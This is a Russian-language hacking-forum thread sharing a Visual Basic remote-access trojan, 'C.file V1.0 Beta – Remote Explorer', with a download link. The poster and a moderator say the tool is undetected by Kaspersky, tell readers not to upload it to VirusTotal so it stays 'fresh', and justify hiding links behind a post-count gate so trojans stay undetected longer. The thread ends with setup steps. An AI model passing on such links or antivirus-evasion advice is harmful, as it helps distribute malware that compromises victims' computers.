• XSS.stack #1 – первый литературный журнал от юзеров форума

C.file V1.0

Ŧ1LAN

CPU register
Пользователь
Решения
1
Реакции
6
C.file V1.0 Beta - Remote Explorer
Довольно таи интересная "штучка" написана на Visual Basic 6. Автор является испанцом и соотвественно всё на испанском. =)[New$paN]
:screenshot: Скриншот|Screenshot
:screenshot: Скриншот|Screenshot
каспером не палится. кому не лень можете посмотреть нодом и др.вебом.
тока не проверяйте вирустоталом т.к. зверюшка свежая ещё. =)
качем тут:
_http://livemobile.dl2.vipserver.ru/damagelab/tilan/c.file v1.0.0.0.rar
P.S. если договорюсь с автором то возможно будут сорсы и русский язык. ;)

эту функцию имел троян триэф.

"Для просмотра этого блока Вам необходимо создать не менее 15 сообщений"
Веселое правило, стимулирующее к флуду....Кто из "опытных" скинет линк в приват или асю 12345 ?
[mod][Ŧ1LAN:] к флуд это не стимулирует, зато меньше трои неплёные по больше живут. если кто и скинет радуйся. хотя ещё одан подобная просьба и бан.[/mod]

2 Ŧ1LAN
Виры непалеными живут около мес, максимум 3 и ты лучше меня это знаешь. Как по мне, так функция ограничения по мессагам это есть глупость, но в чужой монастырь со своим уставом не ходят, делай как знаешь......
З.Ы. За замечание в бан? :rolleyes:
З.З.Ы. +1, такими темпами глядишь скоро че нить и качну с твоего портала :tease:

З.Ы. За замечание в бан?
Нет. Бан за это
Кто из "опытных" скинет линк в приват или асю 12345 ?
.
Виры непалеными живут около мес, максимум 3 и ты лучше меня это знаешь.
о как загнул. твои слова да богу в уши. есть такие хлопчики которые берут свеженький трой и отсылают какому-нибудь касперскому и т.д. например как на virusinfо...
такими темпами глядишь скоро че нить и качну с твоего портала
портал не мой, администратор Winux.
лишь бы не флеймил.
Как по мне, так функция ограничения по мессагам это есть глупость, но в чужой монастырь со своим уставом не ходят, делай как знаешь......
спасибо за понимание. =)

Кста, для работы данной проги необходимы 2 компонента, которых лично у меня не было MSWINSCK.OCXи COMCTL32.OCX
МАНУАЛЬЧЕГ:
если есть такие же братаны по несчастью, то скачиваем их и копируем в
%windir% Открываем «Пуск - Выполнить» и в строке вводим «regsvr32 C:\windows\MSWINSCK.OCX» и нажимаем «ОК» для регистрации среде Windows, повторяем эту же операцию для файла «COMCTL32.OCX», после этого программа должна запуститься без проблем.

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх